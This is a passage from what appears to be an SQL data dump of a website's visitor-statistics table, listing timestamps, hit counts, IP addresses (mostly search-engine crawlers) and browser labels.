203.37','other'),(451806,1569547957,1,1,0,0,'141.8.142.2','other'),(451807,1569548348,1,1,0,0,'207.46.13.128','other'),(451808,1569548726,1,1,0,0,'66.249.66.132','chrome'),(451809,1569549264,1,1,0,0,'66.249.66.136','chrome'),(451810,1569549555,1,1,0,0,'207.46.13.175','other'),(451811,1569549887,3,3,0,0,'66.249.66.134','chrome'),(451812,1569550467,1,1,0,0,'141.8.132.37','other'),(451813,1569550525,1,1,0,0,'66.249.66.136','chrome'),(451814,1569551679,1,1,0,0,'207.46.13.128','other'),(451815,1569551946,1,1,0,0,'141.8.188.25','other'),(451816,1569552175,1,1,0,0,'77.74.177.114','chrome'),(451817,1569552657,2,2,0,0,'207.46.13.175','other'),(451818,1569553175,1,1,0,0,'141.8.142.164','other'),(451819,1569553465,2,2,0,0,'66.249.66.132','chrome'),(451820,1569553484,1,1,0,0,'87.166.53.24','msie'),(451821,1569553944,2,2,0,0,'66.249.66.136','chrome'),(451822,1569554067,1,1,0,0,'66.249.66.88','chrome'),(451823,1569554257,1,1,0,0,'37.9.113.10','other'),(451824,1569554269,1,1,0,0,'128.90.160.121','chrome'),(451825,1569554314,1,1,0,0,'157.55.39.156','other'),(451826,1569554638,1,1,0,0,'66.249.66.132','chrome'),(451827,1569555011,1,1,0,0,'93.159.230.28','chrome'),(451828,1569555420,1,1,0,0,'157.55.39.168','other'),(451829,1569555463,1,1,0,0,'66.249.66.134','chrome'),(451830,1569556110,2,2,0,0,'66.249.66.136','chrome'),(451831,1569556404,1,1,0,0,'157.55.39.156','other'),(451832,1569556569,1,1,0,0,'66.249.66.132','chrome'),(451833,1569556934,3,3,0,0,'66.249.66.134','chrome'),(451834,1569557185,1,1,0,0,'207.46.13.128','other'),(451835,1569557377,1,1,0,0,'37.9.113.33','other'),(451836,1569557497,1,1,0,0,'8.29.198.27','other'),(451837,1569557922,1,1,0,0,'141.8.142.50','other'),(451838,1569557925,1,1,0,0,'37.9.113.177','other'),(451839,1569558001,1,1,0,0,'141.8.132.37','other'),(451840,1569558052,1,1,0,0,'141.8.183.18','other'),(451841,1569558067,2,2,0,0,'66.249.66.132','chrome'),(451842,1569558214,1,1,0,0,'8.29.198.26','other'),(451843,1569558381,1,1,0,0,'141.8.183.15','other'),(451844,1569558542,1,1,0,0,'141.8.188.25','other'),(451845,1569558935,2,2,0,0,'66.249.66.134','chrome'),(451846,1569559293,1,1,0,0,'157.55.39.156','other'),(451847,1569559393,2,2,0,0,'66.249.66.136','chrome'),(451848,1569559479,1,1,0,0,'62.205.134.182','other'),(451849,1569560074,1,1,0,0,'141.8.142.50','chrome'),(451850,1569560303,1,1,0,0,'13.66.139.0','other'),(451851,1569560327,2,2,0,0,'66.249.66.136','chrome'),(451852,1569560414,1,1,0,0,'207.46.13.111','other'),(451853,1569560695,1,1,0,0,'157.55.39.227','other'),(451854,1569560882,1,1,0,0,'66.249.66.88','chrome'),(451855,1569560914,1,1,0,0,'66.249.66.86','chrome'),(451856,1569561376,1,1,0,0,'141.8.188.25','other'),(451857,1569561391,5,5,0,0,'66.249.66.134','chrome'),(451858,1569561441,1,1,0,0,'66.249.66.136','chrome'),(451859,1569561576,1,1,0,0,'37.9.113.177','other'),(451860,1569561982,1,1,0,0,'107.178.238.36','firefox'),(451861,1569562783,1,1,0,0,'141.8.132.19','other'),(451862,1569562793,1,1,0,0,'141.8.183.18','other'),(451863,1569562821,1,1,0,0,'95.108.213.39','other'),(451864,1569563033,1,1,0,0,'37.9.113.6','other'),(451865,1569563174,1,1,0,0,'157.55.39.227','other'),(451866,1569563260,1,1,0,0,'178.154.200.71','other'),(451867,1569563507,1,1,0,0,'212.103.50.243','chrome'),(451868,1569563571,1,1,0,0,'66.249.66.136','chrome'),(451869,1569565532,1,1,0,0,'141.8.142.44','chrome'),(451870,1569566287,2,2,0,0,'207.46.13.176','other'),(451871,1569566406,1,1,0,0,'91.196.178.85','chrome'),(451872,1569567030,1,1,0,0,'37.9.113.163','other'),(451873,1569567372,1,1,0,0,'66.249.66.134','chrome'),(451874,1569567675,1,1,0,0,'78.154.165.144','chrome'),(451875,1569567716,1,1,0,0,'91.196.178.85','chrome'),(451876,1569567761,1,1,0,0,'66.249.66.136','chrome'),(451877,1569567849,2,2,0,0,'66.249.66.132','chrome'),(451878,1569568177,1,1,0,0,'141.8.132.2','other'),(451879,1569568204,2,2,0,0,'207.46.13.176','other'),(451880,1569568216,1,1,0,0,'178.154.200.60','other'),(451881,1569568432,1,1,0,0,'62.210.89.11','firefox'),(451882,1569568838,1,1,0,0,'8.29.198.27','other'),(451883,1569569062,1,1,0,0,'8.29.198.26','other'),(451884,1569569643,1,1,0,0,'95.108.213.55','other'),(451885,1569569785,1,1,0,0,'91.209.11.236','other'),(451886,1569569892,1,1,0,0,'66.249.66.132','chrome'),(451887,1569570300,1,1,0,0,'157.55.39.227','other'),(451888,1569570894,1,1,0,0,'37.9.113.163','other'),(451889,1569571050,1,1,0,0,'141.8.132.12','chrome'),(451890,1569571321,1,1,0,0,'178.154.200.13','other'),(451891,1569571564,1,1,0,0,'141.8.142.50','other'),(451892,1569571775,1,1,0,0,'207.46.13.176','other'),(451893,1569572432,1,1,0,0,'141.8.142.161','other'),(451894,1569572456,1,1,0,0,'141.8.132.2','other'),(451895,1569573229,1,1,0,0,'207.46.13.146','other'),(451896,1569573647,1,1,0,0,'141.8.142.164','other'),(451897,1569573690,1,1,0,0,'141.8.183.18','other'),(451898,1569573747,1,1,0,0,'141.8.142.161','other'),(451899,1569573843,1,1,0,0,'141.8.188.25','other'),(451900,1569574246,1,1,0,0,'87.250.224.90','other'),(451901,1569576405,1,1,0,0,'66.249.66.134','chrome'),(451902,1569576857,1,1,0,0,'37.9.113.10','other'),(451903,1569576867,1,1,0,0,'66.249.66.132','chrome'),(451904,1569576868,1,1,0,0,'178.154.200.71','other'),(451905,1569576869,2,2,0,0,'66.249.66.136','chrome'),(451906,1569577191,1,1,0,0,'178.154.200.60','other'),(451907,1569577509,1,1,0,0,'91.196.178.186','firefox'),(451908,1569577660,1,1,0,0,'207.46.13.229','other'),(451909,1569577974,1,1,0,0,'109.74.154.72','chrome'),(451910,1569578241,1,1,0,0,'91.196.177.134','chrome'),(451911,1569578341,1,1,0,0,'95.108.213.3','other'),(451912,1569578364,1,1,0,0,'213.180.203.44','other'),(451913,1569578401,3,3,0,0,'66.249.66.132','chrome'),(451914,1569578432,1,1,0,0,'66.249.66.134','chrome'),(451915,1569579659,2,0,2,0,'66.249.66.136',''),(451916,1569579660,1,0,1,0,'66.249.66.132',''),(451917,1569579729,1,1,0,0,'8.29.198.27','other'),(451918,1569579943,1,1,0,0,'8.29.198.26','other'),(451919,1569579996,1,1,0,0,'37.9.113.163','other'),(451920,1569580776,1,1,0,0,'66.249.66.136','chrome'),(451921,1569580944,1,0,1,0,'66.249.66.134',''),(451922,1569581231,1,1,0,0,'141.8.183.15','other'),(451923,1569581399,1,1,0,0,'46.96.38.178','chrome'),(451924,1569581881,1,1,0,0,'157.55.39.227','other'),(451925,1569581890,1,1,0,0,'207.46.13.229','other'),(451926,1569582287,1,1,0,0,'178.154.200.33','other'),(451927,1569582289,1,1,0,0,'207.46.13.146','other'),(451928,1569583429,1,1,0,0,'69.171.251.39','other'),(451929,1569583809,1,1,0,0,'87.250.224.90','other'),(451930,1569583965,1,1,0,0,'46.211.100.140','chrome'),(451931,1569584266,1,1,0,0,'37.9.113.10','other'),(451932,1569584324,1,1,0,0,'66.249.66.134','chrome'),(451933,1569584482,1,1,0,0,'66.249.66.136','chrome'),(451934,1569584738,1,1,0,0,'31.13.127.8','other'),(451935,1569585319,1,1,0,0,'5.45.207.65','other'),(451936,1569585363,1,1,0,0,'141.8.183.18','other'),(451937,1569585376,1,1,0,0,'95.108.213.39','other'),(451938,1569585951,2,2,0,0,'66.249.66.134','chrome'),(451939,1569586000,1,1,0,0,'66.249.66.136','chrome'),(451940,1569586119,1,1,0,0,'157.55.39.231','other'),(451941,1569586333,1,1,0,0,'66.249.66.132','chrome'),(451942,1569587202,1,1,0,0,'51.68.152.26','chrome'),(451943,1569587470,1,1,0,0,'66.249.66.136','chrome'),(451944,1569587729,1,1,0,0,'66.249.66.132','chrome'),(451945,1569588040,1,1,0,0,'95.108.213.3','chrome'),(451946,1569588133,1,1,0,0,'178.154.200.71','other'),(451947,1569588187,1,1,0,0,'95.108.181.104','other'),(451948,1569588230,1,1,0,0,'37.9.113.163','chrome'),(451949,1569588614,1,1,0,0,'157.55.39.73','other'),(451950,1569589388,1,1,0,0,'141.8.142.44','other'),(451951,1569589697,1,1,0,0,'95.108.181.104','other'),(451952,1569589807,1,1,0,0,'66.249.66.132','chrome'),(451953,1569590042,2,2,0,0,'95.108.181.103','other'),(451954,1569590046,1,1,0,0,'157.55.39.231','other'),(451955,1569590459,3,3,0,0,'66.249.66.136','chrome'),(451956,1569590557,1,1,0,0,'91.196.178.94','chrome'),(451957,1569590814,1,1,0,0,'66.249.66.134','chrome'),(451958,1569590820,1,1,0,0,'8.29.198.25','other'),(451959,1569590843,1,1,0,0,'5.45.207.65','other'),(451960,1569590846,1,1,0,0,'213.180.203.37','other'),(451961,1569590962,1,1,0,0,'213.180.203.44','other'),(451962,1569591425,1,1,0,0,'141.8.142.164','other'),(451963,1569591772,1,1,0,0,'207.46.13.229','other'),(451964,1569591807,2,2,0,0,'66.249.66.136','chrome'),(451965,1569591836,1,1,0,0,'157.55.39.231','other'),(451966,1569591918,3,3,0,0,'66.249.66.134','chrome'),(451967,1569592805,1,1,0,0,'5.45.207.65','other'),(451968,1569592855,1,1,0,0,'141.8.142.50','other'),(451969,1569592966,1,1,0,0,'66.249.66.134','chrome'),(451970,1569592986,1,1,0,0,'87.250.224.118','other'),(451971,1569593007,1,1,0,0,'66.249.66.136','chrome'),(451972,1569594221,1,1,0,0,'66.249.66.134','chrome'),(451973,1569594621,1,1,0,0,'95.108.213.3','other'),(451974,1569594839,1,1,0,0,'207.46.13.229','other'),(451975,1569595326,1,1,0,0,'31.43.31.239','chrome'),(451976,1569595895,1,1,0,0,'95.108.213.39','chrome'),(451977,1569596057,1,1,0,0,'35.225.156.240','chrome'),(451978,1569596074,1,1,0,0,'34.66.72.74','chrome'),(451979,1569596093,3,3,0,0,'34.67.54.102','chrome'),(451980,1569596107,3,3,0,0,'104.197.16.108','chrome'),(451981,1569596123,3,3,0,0,'34.67.158.164','chrome'),(451982,1569596135,2,2,0,0,'35.193.178.109','chrome'),(451984,1569596278,1,1,0,0,'66.249.66.132','chrome'),(451985,1569596334,1,1,0,0,'87.250.224.90','other'),(451986,1569598008,1,1,0,0,'5.45.207.65','other'),(451987,1569598217,1,1,0,0,'66.249.66.134','chrome'),(451988,1569598284,1,1,0,0,'37.9.113.163','other'),(451989,1569598331,1,1,0,0,'157.55.39.250','other'),(451990,1569598668,2,2,0,0,'66.249.66.132','chrome'),(451991,1569599350,1,1,0,0,'95.108.213.3','other'),(451992,1569599527,1,1,0,0,'66.249.66.136','chrome'),(451993,1569600318,1,1,0,0,'141.8.183.15','chrome'),(451994,1569600424,1,1,0,0,'66.249.66.134','chrome'),(451995,1569600463,1,1,0,0,'37.9.113.10','other'),(451996,1569600486,1,1,0,0,'141.8.142.161','other'),(451997,1569600584,1,1,0,0,'141.8.188.25','other'),(451998,1569600612,1,1,0,0,'91.227.207.9','firefox'),(451999,1569600768,1,1,0,0,'66.102.9.161','chrome'),(452000,1569601261,3,3,0,0,'157.55.39.231','other'),(452001,1569601724,1,1,0,0,'66.249.66.134','chrome'),(452002,1569601726,1,1,0,0,'8.29.198.26','other'),(452003,1569601988,1,1,0,0,'8.29.198.25','other'),(452004,1569602116,1,1,0,0,'66.249.66.88','chrome'),(452005,1569602701,2,2,0,0,'157.55.39.95','other'),(452006,1569604784,1,1,0,0,'66.249.66.136','chrome'),(452007,1569604996,2,2,0,0,'66.249.66.134','chrome'),(452008,1569605358,1,1,0,0,'66.249.66.132','chrome'),(452009,1569607951,1,1,0,0,'141.8.183.18','other'),(452010,1569608023,1,1,0,0,'37.9.113.6','other'),(452011,1569608071,1,1,0,0,'66.249.66.136','chrome'),(452012,1569608462,2,2,0,0,'66.249.66.134','chrome'),(452013,1569610111,1,1,0,0,'141.8.142.2','other'),(452014,1569610346,1,1,0,0,'66.249.66.136','chrome'),(452015,1569610768,1,1,0,0,'95.108.181.104','other'),(452016,1569610994,2,2,0,0,'66.249.66.132','chrome'),(452017,1569611247,1,1,0,0,'66.249.66.136','chrome'),(452018,1569611312,1,1,0,0,'141.8.142.44','other'),(452019,1569611467,1,1,0,0,'141.8.132.37','other'),(452020,1569612593,2,2,0,0,'8.29.198.26','other'),(452021,1569613029,1,1,0,0,'37.53.225.123','chrome'),(452022,1569613154,1,1,0,0,'157.55.39.250','other'),(452023,1569614099,1,1,0,0,'157.55.39.95','other'),(452024,1569614146,1,1,0,0,'66.249.66.132','chrome'),(452025,1569614491,1,1,0,0,'66.249.66.134','chrome'),(452026,1569615146,1,1,0,0,'66.249.66.132','chrome'),(452027,1569615836,1,1,0,0,'85.232.147.155','chrome'),(452028,1569615870,2,2,0,0,'66.249.66.136','chrome'),(452029,1569616002,2,2,0,0,'66.249.66.134','chrome'),(452030,1569616198,1,1,0,0,'141.8.142.164','other'),(452031,1569617805,1,1,0,0,'141.8.142.2','other'),(452032,1569618402,1,1,0,0,'213.180.203.44','other'),(452033,1569618469,1,1,0,0,'157.55.39.250','other'),(452034,1569618653,1,1,0,0,'66.249.66.134','chrome'),(452035,1569618885,1,1,0,0,'141.8.142.164','chrome'),(452036,1569619246,1,1,0,0,'157.55.39.95','other'),(452037,1569620344,1,1,0,0,'141.8.142.161','chrome'),(452038,1569620357,1,1,0,0,'37.9.113.163','other'),(452039,1569620363,1,1,0,0,'141.8.183.15','other'),(452040,1569620440,1,1,0,0,'141.8.132.2','other'),(452041,1569620823,1,1,0,0,'157.55.39.95','other'),(452042,1569621392,1,1,0,0,'66.249.66.86','chrome'),(452043,1569621538,1,1,0,0,'66.249.66.132','chrome'),(452044,1569621985,1,1,0,0,'95.108.181.103','other'),(452045,1569622042,1,1,0,0,'141.8.142.44','other'),(452046,1569622522,1,1,0,0,'157.55.39.250','other'),(452047,1569623163,1,1,0,0,'95.108.213.39','other'),(452048,1569623469,1,1,0,0,'207.46.13.86','other'),(452049,1569623470,1,1,0,0,'8.29.198.25','other'),(452050,1569623524,1,1,0,0,'178.154.200.71','chrome'),(452051,1569623542,1,1,0,0,'141.8.142.161','other'),(452052,1569623744,1,1,0,0,'8.29.198.26','other'),(452053,1569623789,1,1,0,0,'141.8.142.164','other'),(452054,1569623948,2,2,0,0,'207.46.13.38','other'),(452055,1569624419,1,1,0,0,'66.249.66.132','chrome'),(452056,1569624695,1,1,0,0,'207.46.13.86','other'),(452057,1569624769,3,3,0,0,'66.249.66.134','chrome'),(452058,1569626117,1,1,0,0,'141.8.132.12','other'),(452059,1569626161,2,2,0,0,'66.249.66.132','chrome'),(452060,1569626828,1,1,0,0,'207.46.13.86','other'),(452061,1569627190,1,1,0,0,'66.249.66.134','chrome'),(452062,1569627351,1,1,0,0,'178.154.200.13','other'),(452063,1569627659,1,1,0,0,'66.249.66.132','chrome'),(452064,1569628514,1,1,0,0,'62.205.134.182','other'),(452065,1569629679,1,1,0,0,'66.249.66.88','chrome'),(452066,1569629768,1,1,0,0,'87.250.224.118','other'),(452067,1569630102,1,1,0,0,'66.249.66.132','chrome'),(452068,1569630753,1,1,0,0,'66.249.66.136','chrome'),(452069,1569631231,2,2,0,0,'66.249.66.132','chrome'),(452070,1569632660,1,1,0,0,'66.249.66.86','chrome'),(452071,1569632756,2,2,0,0,'66.249.66.136','chrome'),(452072,1569633520,1,1,0,0,'207.46.13.86','other'),(452073,1569633779,1,1,0,0,'66.249.66.134','chrome'),(452074,1569634343,1,1,0,0,'8.29.198.27','other'),(452075,1569634622,1,1,0,0,'8.29.198.25','other'),(452076,1569634725,1,1,0,0,'66.249.66.134','chrome'),(452077,1569635462,1,1,0,0,'66.249.66.132','chrome'),(452078,1569637005,1,1,0,0,'66.249.66.132','chrome'),(452079,1569638220,1,1,0,0,'66.249.66.134','chrome'),(452080,1569639950,1,1,0,0,'66.249.66.134','chrome'),(452081,1569640961,1,1,0,0,'157.55.39.113','other'),(452082,1569641152,1,1,0,0,'66.249.66.132','chrome'),(452083,1569642080,1,1,0,0,'66.249.66.136','chrome'),(452084,1569642667,2,2,0,0,'66.249.66.134','chrome'),(452085,1569642826,3,3,0,0,'66.249.66.132','chrome'),(452086,1569643302,1,1,0,0,'157.55.39.242','other'),(452087,1569643638,1,1,0,0,'66.249.66.136','chrome'),(452088,1569643894,1,1,0,0,'95.108.181.104','other'),(452089,1569643995,1,1,0,0,'66.249.66.132','chrome'),(452090,1569644285,1,1,0,0,'93.119.227.91','other'),(452092,1569644497,2,2,0,0,'45.32.14.134','other'),(452093,1569644838,1,1,0,0,'66.249.66.88','chrome'),(452094,1569645183,1,1,0,0,'66.249.66.134','chrome'),(452095,1569645213,2,2,0,0,'8.29.198.25','other'),(452096,1569645482,1,1,0,0,'8.29.198.26','other'),(452097,1569645845,1,1,0,0,'62.205.134.182','other'),(452098,1569646426,1,1,0,0,'69.4.89.106','firefox'),(452099,1569650412,1,1,0,0,'66.249.66.88','chrome'),(452100,1569650496,1,1,0,0,'66.249.66.136','chrome'),(452101,1569650609,2,2,0,0,'66.249.66.132','chrome'),(452102,1569651591,1,1,0,0,'93.119.227.19','other'),(452103,1569651679,1,1,0,0,'66.249.66.132','chrome'),(452104,1569652277,1,1,0,0,'66.249.66.136','chrome'),(452105,1569652606,1,1,0,0,'157.55.39.242','other'),(452106,1569652611,1,1,0,0,'207.46.13.45','other'),(452107,1569655315,1,1,0,0,'157.55.39.242','other'),(452108,1569655320,2,2,0,0,'157.55.39.79','other'),(452109,1569655485,1,1,0,0,'66.249.66.132','chrome'),(452110,1569656081,1,1,0,0,'66.249.66.136','chrome'),(452111,1569656084,2,2,0,0,'8.29.198.26','other'),(452112,1569656366,1,1,0,0,'8.29.198.27','other'),(452113,1569656433,1,1,0,0,'37.9.113.177','other'),(452114,1569657028,2,2,0,0,'66.249.66.136','chrome'),(452115,1569657151,1,1,0,0,'66.249.66.132','chrome'),(452116,1569657555,1,1,0,0,'5.196.87.174','other'),(452117,1569657949,1,1,0,0,'157.55.39.242','other'),(452118,1569660197,1,1,0,0,'157.55.39.79','other'),(452119,1569660548,2,2,0,0,'66.249.66.136','chrome'),(452120,1569660930,1,1,0,0,'66.249.66.88','chrome'),(452121,1569661281,2,2,0,0,'207.46.13.45','other'),(452122,1569661382,1,1,0,0,'66.249.66.86','chrome'),(452123,1569661832,1,1,0,0,'66.249.66.88','chrome'),(452124,1569662723,1,1,0,0,'157.55.39.123','other'),(452125,1569662917,1,1,0,0,'157.55.39.242','other'),(452126,1569663548,1,1,0,0,'66.249.66.132','chrome'),(452127,1569664015,1,1,0,0,'109.74.154.72','chrome'),(452128,1569664388,1,1,0,0,'157.55.39.255','other'),(452129,1569665906,1,1,0,0,'157.55.39.255','other'),(452130,1569666943,2,2,0,0,'8.29.198.27','other'),(452131,1569667525,3,3,0,0,'157.55.39.61','other'),(452132,1569668065,1,1,0,0,'157.55.39.123','other'),(452133,1569668492,1,1,0,0,'66.249.66.132','chrome'),(452134,1569668953,1,1,0,0,'66.249.66.136','chrome'),(452135,1569669011,1,1,0,0,'66.249.66.134','chrome'),(452136,1569669119,1,1,0,0,'207.46.13.221','other'),(452137,1569669759,1,1,0,0,'91.196.178.174','chrome'),(452138,1569670062,1,1,0,0,'66.249.66.86','chrome'),(452139,1569670289,2,2,0,0,'66.249.66.136','chrome'),(452140,1569670538,1,1,0,0,'207.46.13.221','other'),(452141,1569670594,2,2,0,0,'66.249.66.134','chrome'),(452142,1569674458,1,1,0,0,'46.211.130.50','chrome'),(452143,1569675356,1,1,0,0,'66.249.66.134','chrome'),(452144,1569675888,2,2,0,0,'66.249.66.136','chrome'),(452145,1569677049,1,1,0,0,'66.249.66.134','chrome'),(452146,1569677736,1,1,0,0,'66.249.66.136','chrome'),(452147,1569677766,1,1,0,0,'141.8.132.2','other'),(452148,1569677812,2,2,0,0,'8.29.198.27','other'),(452149,1569677976,1,1,0,0,'157.55.39.60','other'),(452150,1569678121,2,2,0,0,'66.249.66.134','chrome'),(452151,1569678617,1,1,0,0,'66.249.66.132','chrome'),(452152,1569679483,1,1,0,0,'92.113.191.74','chrome'),(452153,1569679667,1,1,0,0,'157.55.39.60','other'),(452154,1569680389,1,1,0,0,'66.249.66.134','chrome'),(452155,1569680475,2,2,0,0,'91.218.14.236','firefox'),(452156,1569680532,1,1,0,0,'178.154.200.13','other'),(452157,1569682199,1,1,0,0,'66.249.66.88','chrome'),(452158,1569682615,3,3,0,0,'104.198.140.193','chrome'),(452159,1569682662,3,3,0,0,'35.226.230.103','chrome'),(452160,1569682728,3,3,0,0,'35.194.6.203','chrome'),(452161,1569682783,5,5,0,0,'34.68.242.167','chrome'),(452162,1569682806,3,3,0,0,'35.222.121.49','chrome'),(452163,1569685377,1,1,0,0,'207.46.13.10','other'),(452164,1569685960,1,1,0,0,'157.55.39.60','other'),(452165,1569687476,2,2,0,0,'66.249.66.86','chrome'),(452166,1569688300,1,1,0,0,'157.55.39.60','other'),(452167,1569688505,1,1,0,0,'66.249.66.136','chrome'),(452168,1569688677,1,1,0,0,'8.29.198.25','other'),(452169,1569688801,1,1,0,0,'207.46.13.10','other'),(452170,1569688922,1,1,0,0,'46.96.51.207','firefox'),(452171,1569688981,1,1,0,0,'8.29.198.27','other'),(452172,1569689906,2,2,0,0,'66.249.66.132','chrome'),(452173,1569689956,1,1,0,0,'66.249.66.134','chrome'),(452174,1569690862,1,1,0,0,'66.249.66.132','chrome'),(452175,1569691354,1,1,0,0,'66.249.66.86','chrome'),(452176,1569691356,1,1,0,0,'157.55.39.60','other'),(452177,1569693916,1,1,0,0,'185.30.202.123','chrome'),(452178,1569694740,1,1,0,0,'66.249.66.86','chrome'),(452179,1569694798,1,1,0,0,'66.249.66.132','chrome'),(452180,1569695757,1,1,0,0,'207.46.13.10','other'),(452181,1569696190,1,1,0,0,'66.249.66.88','chrome'),(452182,1569696557,1,1,0,0,'5.62.19.35','chrome'),(452183,1569697834,1,1,0,0,'66.249.66.132','chrome'),(452184,1569698606,1,1,0,0,'207.46.13.10','other'),(452185,1569699532,2,2,0,0,'8.29.198.25','other'),(452186,1569700499,1,1,0,0,'207.46.13.10','other'),(452187,1569702760,1,1,0,0,'157.55.39.233','other'),(452188,1569703926,1,1,0,0,'66.249.66.134','chrome'),(452189,1569706311,1,1,0,0,'157.55.39.233','other'),(452190,1569706327,1,1,0,0,'66.249.66.136','chrome'),(452191,1569707816,1,1,0,0,'66.249.66.88','chrome'),(452192,1569707857,1,1,0,0,'66.249.66.134','chrome'),(452193,1569708030,2,2,0,0,'66.249.66.132','chrome'),(452194,1569708156,1,1,0,0,'157.55.39.148','other'),(452195,1569708839,1,1,0,0,'66.249.66.134','chrome'),(452196,1569708964,2,2,0,0,'66.249.66.132','chrome'),(452197,1569709251,1,1,0,0,'157.55.39.173','other'),(452198,1569710275,2,2,0,0,'66.249.66.132','chrome'),(452199,1569710307,2,2,0,0,'66.249.66.134','chrome'),(452200,1569710396,1,1,0,0,'8.29.198.27','other'),(452201,1569710719,1,1,0,0,'8.29.198.25','other'),(452202,1569711118,1,1,0,0,'157.55.39.22','other'),(452203,1569711863,1,1,0,0,'66.249.66.136','chrome'),(452204,1569712000,1,1,0,0,'66.249.66.86','chrome'),(452205,1569712580,1,1,0,0,'207.46.13.229','other'),(452206,1569712837,2,2,0,0,'66.249.66.134','chrome'),(452207,1569713015,3,3,0,0,'66.249.66.136','chrome'),(452208,1569713277,1,1,0,0,'5.196.87.174','other'),(452209,1569714913,1,1,0,0,'62.205.134.182','other'),(452210,1569715315,2,2,0,0,'207.46.13.229','other'),(452211,1569716245,1,1,0,0,'66.249.66.88','chrome'),(452212,1569716283,1,1,0,0,'5.196.87.171','other'),(452213,1569716911,1,1,0,0,'66.249.66.134','chrome'),(452214,1569718734,1,1,0,0,'66.249.66.134','chrome'),(452215,1569718926,1,1,0,0,'66.249.66.136','chrome'),(452216,1569718971,1,1,0,0,'66.249.66.88','chrome'),(452217,1569719156,2,2,0,0,'207.46.13.229','other'),(452218,1569720317,1,1,0,0,'66.249.66.134','chrome'),(452219,1569721245,1,1,0,0,'8.29.198.27','other'),(452220,1569721339,2,2,0,0,'157.55.39.148','other'),(452221,1569721564,1,1,0,0,'8.29.198.25','other'),(452222,1569721569,2,2,0,0,'66.249.66.134','chrome'),(452223,1569722051,1,1,0,0,'66.249.66.136','chrome'),(452224,1569722218,1,1,0,0,'167.114.209.38','other'),(452225,1569722242,1,1,0,0,'167.114.209.38','chrome'),(452226,1569722517,1,1,0,0,'157.55.39.148','other'),(452227,1569722743,1,1,0,0,'66.249.66.134','chrome'),(452228,1569722857,1,1,0,0,'157.55.39.22','other'),(452229,1569723758,1,1,0,0,'5.196.87.172','other'),(452230,1569724218,2,2,0,0,'157.55.39.148','other'),(452231,1569724365,1,1,0,0,'157.55.39.22','other'),(452232,1569725102,1,1,0,0,'66.249.66.132','chrome'),(452233,1569725108,1,1,0,0,'66.249.66.134','chrome'),(452234,1569725205,1,1,0,0,'5.196.87.174','other'),(452235,1569725595,1,1,0,0,'42.51.34.174','other'),(452236,1569727202,2,2,0,0,'157.55.39.148','other'),(452237,1569727221,1,1,0,0,'66.249.66.88','chrome'),(452238,1569728984,1,1,0,0,'66.249.66.134','chrome'),(452239,1569729002,1,1,0,0,'173.212.233.72','chrome'),(452240,1569730120,1,1,0,0,'66.249.66.132','chrome'),(452241,1569730174,1,1,0,0,'66.249.66.136','chrome'),(452242,1569730638,1,1,0,0,'66.249.66.88','chrome'),(452243,1569730793,1,1,0,0,'66.249.66.134','chrome'),(452244,1569730805,1,1,0,0,'207.46.13.27','other'),(452245,1569731189,1,1,0,0,'66.249.66.132','chrome'),(452246,1569731461,1,1,0,0,'185.41.128.73','chrome'),(452247,1569731482,1,1,0,0,'46.211.109.236','chrome'),(452248,1569731871,1,1,0,0,'66.249.66.134','chrome'),(452249,1569732090,2,2,0,0,'8.29.198.27','other'),(452250,1569732158,1,1,0,0,'66.249.66.136','chrome'),(452251,1569732277,1,1,0,0,'62.205.134.182','other'),(452252,1569733009,1,1,0,0,'120.76.126.197','other'),(452253,1569734201,1,1,0,0,'66.249.66.132','chrome'),(452254,1569736470,1,1,0,0,'91.196.178.27','chrome'),(452255,1569736599,1,1,0,0,'66.249.66.136','chrome'),(452256,1569736655,1,1,0,0,'66.249.66.134','chrome'),(452257,1569738185,1,1,0,0,'66.249.66.134','chrome'),(452258,1569738631,1,1,0,0,'66.249.66.132','chrome'),(452259,1569739701,1,1,0,0,'66.249.66.86','chrome'),(452260,1569739781,1,1,0,0,'66.249.66.132','chrome'),(452261,1569740308,1,1,0,0,'66.249.66.134','chrome'),(452262,1569740371,1,1,0,0,'207.46.13.27','other'),(452263,1569740517,1,1,0,0,'66.249.66.136','chrome'),(452264,1569741912,1,1,0,0,'37.9.113.177','other'),(452265,1569742021,1,1,0,0,'37.9.113.33','other'),(452266,1569742940,1,1,0,0,'8.29.198.25','other'),(452267,1569742979,1,1,0,0,'5.45.207.49','other'),(452268,1569742992,1,1,0,0,'37.9.113.33','other'),(452269,1569743042,1,1,0,0,'213.180.203.37','other'),(452270,1569743065,1,1,0,0,'178.154.200.33','other'),(452271,1569743144,1,1,0,0,'37.9.113.10','other'),(452272,1569743237,1,1,0,0,'66.249.66.132','chrome'),(452273,1569743259,1,1,0,0,'8.29.198.27','other'),(452274,1569743711,1,1,0,0,'207.46.13.126','other'),(452275,1569744170,1,1,0,0,'207.46.13.27','other'),(452276,1569744218,1,1,0,0,'141.8.142.2','other'),(452277,1569744470,2,2,0,0,'66.249.66.134','chrome'),(452278,1569744575,2,2,0,0,'66.249.66.136','chrome'),(452279,1569744793,1,1,0,0,'95.108.181.104','other'),(452280,1569745649,2,2,0,0,'66.249.66.132','chrome'),(452281,1569746231,1,1,0,0,'66.249.66.134','chrome'),(452282,1569746405,1,1,0,0,'178.154.200.60','other'),(452283,1569746843,1,1,0,0,'91.196.178.27','chrome'),(452284,1569747543,1,1,0,0,'66.249.66.136','chrome'),(452285,1569747557,1,1,0,0,'141.8.142.177','other'),(452286,1569747687,1,1,0,0,'66.249.66.134','chrome'),(452287,1569748117,1,1,0,0,'141.8.132.12','other'),(452288,1569748598,1,1,0,0,'5.196.87.175','other'),(452289,1569748706,1,1,0,0,'66.249.66.132','chrome'),(452290,1569748753,1,1,0,0,'87.250.224.90','other'),(452291,1569748760,1,1,0,0,'37.9.113.10','other'),(452292,1569749801,1,1,0,0,'95.108.181.104','other'),(452293,1569749993,1,1,0,0,'109.74.154.72','chrome'),(452294,1569750062,1,1,0,0,'213.180.203.37','chrome'),(452295,1569750753,1,1,0,0,'5.196.87.171','other'),(452296,1569751093,1,1,0,0,'207.46.13.241','other'),(452297,1569751476,1,1,0,0,'141.8.188.29','other'),(452298,1569752218,2,2,0,0,'207.46.13.126','other'),(452299,1569752754,1,1,0,0,'58.250.125.119','other'),(452300,1569752988,1,1,0,0,'66.249.66.134','chrome'),(452301,1569753333,1,1,0,0,'207.46.13.241','other'),(452302,1569753457,1,1,0,0,'207.46.13.126','other'),(452303,1569753753,2,2,0,0,'66.249.66.132','chrome'),(452304,1569753787,2,2,0,0,'8.29.198.27','other'),(452305,1569754654,2,2,0,0,'207.46.13.221','other'),(452306,1569754664,1,1,0,0,'207.46.13.126','other'),(452307,1569754668,1,1,0,0,'157.55.39.185','other'),(452308,1569754674,